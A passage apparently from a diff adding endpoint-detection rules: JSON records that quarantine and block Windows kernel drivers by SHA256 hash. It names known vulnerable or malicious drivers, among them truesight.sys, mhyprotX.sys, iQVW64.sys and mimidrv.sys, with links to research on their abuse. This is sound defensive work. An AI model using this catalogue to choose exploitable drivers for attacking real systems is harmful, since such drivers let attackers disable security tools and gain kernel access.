"e3e85930-6b6f-5346-ac89-d0e8d55e060f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.836504Z", + "creation_date": "2026-03-23T11:45:30.836506Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.836512Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ab3ef21f5a64c36ddacb54348711f94609850745824185b7286759e635a1c027", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e3ea0e71-eec5-50fe-a18d-69c973fba937", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.459157Z", + "creation_date": "2026-03-23T11:45:30.459160Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:30.459169Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0f3e7bf7b103613844a38afb574817ddaecd00e4d206d891660dbb0e5dfee04e", + "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e3f1aa89-8f1d-5130-b392-08007300f9d8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.474090Z", + "creation_date": "2026-03-23T11:45:30.474093Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.474102Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "14b04931ee50e5d2560f42cc33b05f047886a8a7d45b3274ae78e5646a1cf1a5", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e3f3721a-89fc-568a-9006-09b242e5680f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": 
"moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612018Z", + "creation_date": "2026-03-23T11:45:29.612020Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612027Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0c512b615eac374d4d494e3c36838d8e788b3dc2691bf27916f7f42694b14467", + "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e3fc9596-6771-530c-95a8-a5e6dfe1d0f9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976389Z", + "creation_date": "2026-03-23T11:45:29.976391Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976400Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc", + "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e3fd6c85-c1bc-5f85-b843-60329bd5f6f2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.457965Z", + "creation_date": "2026-03-23T11:45:30.457968Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.457977Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "653f6a65e0e608cae217bea2f90f05d8125cf23f83ba01a60de0f5659cfa5d4d", + "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e3ff176c-17f0-5022-ac80-52219112f312", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612774Z", + "creation_date": "2026-03-23T11:45:29.612776Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612782Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1631d124bd8b2917c37abfe0f7b3dfa9e309ec54f69bdab2e2b5de3929d523d7", + "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e41669fa-7c44-5aa2-a90b-b93dd4c6dc6f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.824461Z", + "creation_date": "2026-03-23T11:45:31.824464Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.824472Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "153533a9f0457d657ba83aa8266b9682ec4be382c5ba7e9b2a8f46c8e40f1847", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e419957d-8a5d-57b8-aade-b4206bef0dc8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145412Z", + "creation_date": "2026-03-23T11:45:31.145414Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145420Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5df6f4e9933b3daca829cd5655b87c96b00660a5ac676a78daa8ae48ae77b820", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e42ae20d-cc86-5322-a490-4b9cf30f150a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981801Z", + "creation_date": 
"2026-03-23T11:45:29.981803Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981809Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dfaefd06b680f9ea837e7815fc1cc7d1f4cc375641ac850667ab20739f46ad22", + "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e434abe6-b708-509f-bbaa-2fc7db032dd2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.825316Z", + "creation_date": "2026-03-23T11:45:30.825319Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.825327Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7eedcffe6307d3ed362abccdba78c801f02eb6e1ec409b350c85b46af6cb78a8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e439795b-3935-5d3e-9a77-acddecf92b81", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145921Z", + "creation_date": "2026-03-23T11:45:31.145924Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145932Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2dc4b9468188d2f82162d605bf5ee5cd15826af5758708dc4df9260c3e301afd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e43bd353-9a22-5267-ab25-e86d8cb33707", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495632Z", + "creation_date": "2026-03-23T11:45:31.495635Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.495643Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "090c615cc3e63a3960f7ecaad8db7305308a6b38e1a4648a24f75f39a9d59318", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e43e1132-eb39-5857-b0b2-dde3cb8248c4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.149536Z", + "creation_date": "2026-03-23T11:45:31.149539Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.149549Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ea1393cb9e0e2e0dcb9447803ef545cd15450888e3d11b95687fec5e7120951c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e4540ad0-a322-51ff-827a-e623ea00cf0c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613824Z", + "creation_date": "2026-03-23T11:45:29.613826Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613831Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "20c87381f8f0bf953cb109a5d50a2184c0104cc8ab30e2f94dfba89a5d19b9d8", + "comment": "BioStar Microtech drivers vulnerable to kernel memory mapping function (aka BSMEMx64.sys, BSMIXP64.sys, BSMIx64.sys, BS_Flash64.sys, BS_HWMIO64_W10.sys, BS_HWMIo64.sys and BS_I2c64.sys) [https://www.loldrivers.io/drivers/9e87b6b0-00ed-4259-bcd7-05e2c924d58c/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e466229e-6f49-5adb-a49b-76ca430abbee", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.469571Z", + "creation_date": "2026-03-23T11:45:30.469575Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.469583Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2c5c067497a0490e9fe79d0e4f9f759af93138b1a0bea08a89af09e119390c7a", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e46a6add-3fef-53a3-8afa-9bddb547f6e4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.482454Z", + "creation_date": "2026-03-23T11:45:31.482458Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.482467Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "89df4a4c238e810dfce318f53f61f4837c821f3b6387e82be653d59f1e5202d6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e46c1780-5889-5489-8813-2669a63d87e3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.149336Z", + "creation_date": "2026-03-23T11:45:31.149338Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.149344Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c610def6e9b350c198eeaa929743e1ba961cca04eff5a65b1e5b5eeed71f7d1b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e46e1ee8-407f-5dfb-be22-a02a191749d3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.494457Z", + "creation_date": "2026-03-23T11:45:31.494459Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494465Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5c095dcbe167ec1a6b128d565954da5d68361780afdf89286860a572bd8210d2", 
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e47e8046-bdf5-52bf-9223-b5e9683b73ab", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.151498Z", + "creation_date": "2026-03-23T11:45:31.151501Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.151511Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0b2007739377d936d092b86d05f8cbaaf72330033d9a1601fa7b0dda4923f927", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e49510a1-37c7-5849-9ccb-d9d46952dcb4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, 
+ "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811933Z", + "creation_date": "2026-03-23T11:45:31.811936Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811941Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a277340559f47f2bb547268d30d302864d7b80600e0331d242b29235001b1048", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e4961f21-2f5d-5aa2-9b5f-dd803d0955f3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972198Z", + "creation_date": "2026-03-23T11:45:29.972202Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972210Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "785e87bc23a1353fe0726554fd009aca69c320a98445a604a64e23ab45108087", + "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] 
[https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e498e987-6b6c-5fc7-9dc9-a930230ad597", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818683Z", + "creation_date": "2026-03-23T11:45:30.818686Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818691Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9e855f9d5f5f4dc9420f34045df5d2c70498468f076d873571fc62e4015e38d3", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e4a155ab-6117-5a67-97f2-60f2054ca123", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977374Z", + "creation_date": "2026-03-23T11:45:29.977376Z", + "enabled": 
true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977382Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "082d4d4d4ba1bda5e1599bd24e930ae9f000e7d12b00f7021cca90a4600ea470", + "comment": "Vulnerable Kernel Driver (aka ProtectS.sys) [https://www.loldrivers.io/drivers/99668140-a8f6-48f8-86d1-cf3bf693600c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e4a22f12-95f2-5f71-bff3-25ce095bebe2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.494728Z", + "creation_date": "2026-03-23T11:45:31.494730Z", 